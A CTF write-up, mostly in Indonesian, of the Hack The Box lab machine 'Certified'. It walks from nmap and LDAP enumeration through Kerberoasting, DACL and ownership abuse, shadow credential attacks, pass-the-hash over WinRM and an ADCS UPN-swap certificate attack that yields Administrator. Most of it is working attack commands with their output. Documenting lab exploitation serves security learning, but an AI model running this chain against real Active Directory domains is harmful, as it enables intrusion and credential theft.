CERTIFIED
CERTIFIED
Embedded Files
Certified is an medium difficulty machine.
Skill Learned: Active Directory, Shadow Credential & CA Attacks
Machine Information:
As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
export box=10.10.11.41
export domain=certified.htb
export machine=DC01
export user=judith.mader
export pass=judith09
ENUMERATION
ENUMERATION
Comprehensive Scan
Comprehensive Scan
┌──(glmx㉿kali)-[~/htb/certified]
└─$ sudo nmap -p- -sV -sC -O -Pn --disable-arp-ping $box
[sudo] password for glmx:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 15:54 WIB
Nmap scan report for 10.10.11.41
Host is up (0.068s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-29 15:44:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-12-29T15:46:22+00:00; +6h45m05s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-12-29T15:46:21+00:00; +6h45m05s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-12-29T15:46:22+00:00; +6h45m05s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-12-29T15:46:21+00:00; +6h45m05s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49738/tcp open msrpc Microsoft Windows RPC
49773/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-29T15:45:42
|_ start_date: N/A
|_clock-skew: mean: 6h45m04s, deviation: 0s, median: 6h45m04s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
LDAP (Lightweight Directory Access Protocol)
LDAP (Lightweight Directory Access Protocol)
┌──(glmx㉿kali)-[~]
└─$ ldapire.py $box
------------------------------------------------------------
Server Information
------------------------------------------------------------
• IP Address : 10.10.11.41
• Domain Name : certified.htb
• Server Name : DC01
• Forest Level: 7
• Domain Level: 7
Functional Level Number dan sistem operasi Windows Server yang sesuai:
0: Windows 2000
1: Windows Server 2003 Interim
2: Windows Server 2003
3: Windows Server 2008
4: Windows Server 2008 R2
5: Windows Server 2012
6: Windows Server 2012 R2
7: Windows Server 2016
8: Windows Server 2019
9: Windows Server 2022
Full Server Name:
CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=certified,DC=htb
Penyesuaian waktu dengan machine untuk melakukan eksploitasi Kerberos
┌──(glmx㉿kali)-[~]
└─$ sudo ntpdate -s $domain
Kerberos
Kerberos
ASReprosting
┌──(glmx㉿kali)-[~]
└─$ netexec ldap $box -u $user -p $pass --asreproast asrep.txt
LDAP 10.10.11.41 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 [*] Total of records returned 3
LDAP 10.10.11.41 389 DC01 No entries found!
Kerberoasting untuk mengambil management_svc hash
┌──(glmx㉿kali)-[~/htb/certified]
└─$ netexec ldap $machine.$domain -u $user -p $pass --kerberoasting kerb.out
LDAP 10.10.11.41 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 Bypassing disabled account krbtgt
LDAP 10.10.11.41 389 DC01 [*] Total of records returned 1
LDAP 10.10.11.41 389 DC01 sAMAccountName: management_svc memberOf: CN=Management,CN=Users,DC=certified,DC=htb pwdLastSet: 2024-05-13 22:30:51.476756 lastLogon:2024-12-29 16:49:08.722184
LDAP 10.10.11.41 389 DC01 $krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$a94347ada648c1ec......611a55d2889aaa493bb9ab2f4ee1
Cracking menggunakan Hashcat tapi gagal..
FOOTHOLD
FOOTHOLD
Smbclient
Smbclient
└─$ smbclient -U $user "\\\\$box\\SYSVOL"
Password for [WORKGROUP\judith.mader]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 13 22:02:13 2024
.. D 0 Mon May 13 22:02:13 2024
certified.htb Dr 0 Mon May 13 22:02:13 2024
5085183 blocks of size 4096. 1272184 blocks available
┌──(glmx㉿kali)-[~/htb/certified]
└─$ smbclient -U $user "\\\\$box\\NETLOGON"
Password for [WORKGROUP\judith.mader]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon May 13 22:02:13 2024
.. D 0 Mon May 13 22:02:13 2024
5085183 blocks of size 4096. 1272184 blocks available
Tidak menemui hasil yang menarik..
Enumerate Users:
┌──(glmx㉿kali)-[~/htb/certified]
└─$ impacket-lookupsid $domain/$user@$machine.$domain -domain-sids
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at DC01.certified.htb
[*] StringBinding ncacn_np:DC01.certified.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-729746778-2675978091-3820388244
498: CERTIFIED\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CERTIFIED\Administrator (SidTypeUser)
501: CERTIFIED\Guest (SidTypeUser)
502: CERTIFIED\krbtgt (SidTypeUser)
512: CERTIFIED\Domain Admins (SidTypeGroup)
513: CERTIFIED\Domain Users (SidTypeGroup)
514: CERTIFIED\Domain Guests (SidTypeGroup)
515: CERTIFIED\Domain Computers (SidTypeGroup)
516: CERTIFIED\Domain Controllers (SidTypeGroup)
517: CERTIFIED\Cert Publishers (SidTypeAlias)
518: CERTIFIED\Schema Admins (SidTypeGroup)
519: CERTIFIED\Enterprise Admins (SidTypeGroup)
520: CERTIFIED\Group Policy Creator Owners (SidTypeGroup)
521: CERTIFIED\Read-only Domain Controllers (SidTypeGroup)
522: CERTIFIED\Cloneable Domain Controllers (SidTypeGroup)
525: CERTIFIED\Protected Users (SidTypeGroup)
526: CERTIFIED\Key Admins (SidTypeGroup)
527: CERTIFIED\Enterprise Key Admins (SidTypeGroup)
553: CERTIFIED\RAS and IAS Servers (SidTypeAlias)
571: CERTIFIED\Allowed RODC Password Replication Group (SidTypeAlias)
572: CERTIFIED\Denied RODC Password Replication Group (SidTypeAlias)
1000: CERTIFIED\DC01$ (SidTypeUser)
1101: CERTIFIED\DnsAdmins (SidTypeAlias)
1102: CERTIFIED\DnsUpdateProxy (SidTypeGroup)
1103: CERTIFIED\judith.mader (SidTypeUser)
1104: CERTIFIED\Management (SidTypeGroup)
1105: CERTIFIED\management_svc (SidTypeUser)
1106: CERTIFIED\ca_operator (SidTypeUser)
1601: CERTIFIED\alexander.huges (SidTypeUser)
1602: CERTIFIED\harry.wilson (SidTypeUser)
1603: CERTIFIED\gregory.cameron (SidTypeUser)
Bloodhound
Bloodhound
Bloodhound Collection
Gagal menggunakan netexec
┌──(glmx㉿kali)-[~/htb/certified]
└─$ netexec ldap $machine.$domain -u $user -p $pass --bloodhound --collection All
LDAP 10.10.11.41 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 Resolved collection methods: objectprops, rdp, container, acl, dcom, group, psremote, trusts, session, localadmin
LDAP 10.10.11.41 389 DC01 [-] Could not find a domain controller. Consider specifying a domain and/or DNS server.
Berhasil menggunakan bloodhound-python
┌──(glmx㉿kali)-[~/htb/certified]
└─$ bloodhound-python -dc $machine.$domain -c All -u $user -p $pass -d $domain -ns $box
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 16S
Menjadikan Judith owner pada grup Manajemen & menambahkannya sebagai pengguna:
┌──(glmx㉿kali)-[~/htb/certified]
└─$ impacket-owneredit -action write -new-owner $user -target-sid 'S-1-5-21-729746778-2675978091-3820388244-1104' $domain/$user:$pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
...
...
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-1103
[*] - sAMAccountName: judith.mader
[*] - distinguishedName: CN=Judith Mader,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
┌──(glmx㉿kali)-[~/htb/certified]
└─$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal $user -target-sid 'S-1-5-21-729746778-2675978091-3820388244-1104' $domain/$user:$pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
...
...
[*] DACL backed up to dacledit-20241230-000950.bak
[*] DACL modified successfully!
┌──(glmx㉿kali)-[~/htb/certified]
└─$ net rpc group addmem "Management" $user -U $domain/$user%$pass -S $box
┌──(glmx㉿kali)-[~/htb/certified]
└─$ net rpc group members "Management" -U $domain/$user%$pass -S $box
CERTIFIED\judith.mader
CERTIFIED\management_svc
Shadow Credential Attacks terhadap "Management_svc"
┌──(whisker)─(glmx㉿kali)-[~/htb/certified/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d $domain -u $user -p $pass --target "MANAGEMENT_SVC" --action "add" --filename newCert --export PEM
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 87750fee-e646-3374-d10e-eaf6f03383aa
[*] Updating the msDS-KeyCredentialLink attribute of MANAGEMENT_SVC
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PEM certificate at path: newCert_cert.pem
[+] Saved PEM private key at path: newCert_priv.pem
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Request TGT
┌──(pkinit)─(glmx㉿kali)-[~/htb/certified]
└─$ python3 PKINITtools/gettgtpkinit.py -cert-pem newCert_cert.pem -key-pem newCert_priv.pem $domain/MANAGEMENT_SVC MANAGEMENT_SVC.ccache
2024-12-30 00:26:55,095 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-12-30 00:26:55,110 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2024-12-30 00:27:18,624 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-12-30 00:27:18,624 minikerberos INFO c****d
INFO:minikerberos:c***d
2024-12-30 00:27:18,626 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
Request hash pengguna "MANAGEMENT_SVC"
┌──(pkinit)─(glmx㉿kali)-[~/htb/certified]
└─$ python3 PKINITtools/getnthash.py -key c***d $domain/MANAGEMENT_SVC
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
/home/glmx/htb/certified/PKINITtools/getnthash.py:144: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/home/glmx/htb/certified/PKINITtools/getnthash.py:192: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting ticket to self with PAC
Recovered NT Hash
a***4
***Telah Mencoba Crack menggunakan HASHCAT & John, Tidak berhasil
┌──(pkinit)─(glmx㉿kali)-[~/htb/certified]
└─$ export hash=a***4 \
> export user1=MANAGEMENT_SVC
Verifikasi & login menggunakan hash:
┌──(pkinit)─(glmx㉿kali)-[~/htb/certified]
└─$ netexec smb $box -u $user1 -H $hash
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\MANAGEMENT_SVC:a***4
┌──(glmx㉿kali)-[~/htb/certified]
└─$ evil-winrm -i $box -u $user1 -H $hash
*Evil-WinRM* PS C:\Users\management_svc\Documents> ls
*Evil-WinRM* PS C:\Users\management_svc\Documents> cat ../Desktop/user.txt
9***5
Lateral Movement
Lateral Movement
Pada Bloodhound, terlihat hubungan antara MANAGEMENT_SVC (akun service) & CA_OPERATOR (akun operator) yang diberi label "GenericAll", yang artinya MANAGEMENT_SVC memiliki kemampuan penuh terhadap CA_OPERATOR.
┌──(glmx㉿kali)-[~/htb/certified]
└─$ python3 pywhisker/pywhisker/pywhisker.py -d $domain -u $user1 -H :$hash --target "CA_OPERATOR" --action "add" --filename CACert --export PEM
[*] Searching for the target account
[*] Target user found: CN=operator ca,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: d57f322c-64e6-bb9d-4dfc-944932154082
[*] Updating the msDS-KeyCredentialLink attribute of CA_OPERATOR
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PEM certificate at path: CACert_cert.pem
[+] Saved PEM private key at path: CACert_priv.pem
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(glmx㉿kali)-[~/htb/certified]
└─$ python3 PKINITtools/gettgtpkinit.py -cert-pem CACert_cert.pem -key-pem CACert_priv.pem $domain/CA_OPERATOR CA_OPERATOR.ccache
2024-12-30 01:05:01,351 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-12-30 01:05:01,368 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2024-12-30 01:05:24,936 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-12-30 01:05:24,936 minikerberos INFO 2***4
INFO:minikerberos:2***4
2024-12-30 01:05:24,940 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
┌──(glmx㉿kali)-[~/htb/certified]
└─$ export KRB5CCNAME=CA_OPERATOR.ccache
export user2=ca_operator
┌──(glmx㉿kali)-[~/htb/certified]
└─$ python3 PKINITtools/getnthash.py -key $hash $domain/$user2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
/home/glmx/htb/certified/PKINITtools/getnthash.py:144: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/home/glmx/htb/certified/PKINITtools/getnthash.py:192: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting ticket to self with PAC
Recovered NT Hash
2***2
┌──(glmx㉿kali)-[~/htb/certified]
└─$ netexec smb $box -u $user2 -H $hash
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\CA_OPERATOR:2***2
┌──(glmx㉿kali)-[~/htb/certified]
└─$ netexec smb $box -u $user2 -H $hash --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\CA_OPERATOR:2***2
SMB 10.10.11.41 445 DC01 [*] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share
Privilege Escalation
Privilege Escalation
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad find -vulnerable -u $user2@$domain -hashes :$caHash -dc-ip $box
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20241230054616_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241230054616_Certipy.txt'
[*] Saved JSON output to '20241230054616_Certipy.json'
┌──(glmx㉿kali)-[~/htb/certified]
└─$ export svcHash=a***4
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad account update -username management_svc@$domain -hashes :$svchash -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad req -username ca_operator@$domain -hashes :$caHash -ca certified-DC01-CA -template CertifiedAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad account update -username management_svc@$domain -hashes :$svchash -user ca_operator -upn ca_operator@$domain
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'
┌──(glmx㉿kali)-[~/htb/certified]
└─$ certipy-ad auth -pfx administrator.pfx -domain $domain
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': a***e:0****4
┌──(glmx㉿kali)-[~/htb/certified]
└─$ export admHash=0***4 \
export user3=administrator
┌──(glmx㉿kali)-[~/htb/certified]
└─$ evil-winrm -i $box -u $user3 -H $admHash
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
d<root_flag>a
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\Users\management_svc\Desktop\user.txt
9<user_flag>5
Google Sites
Report abuse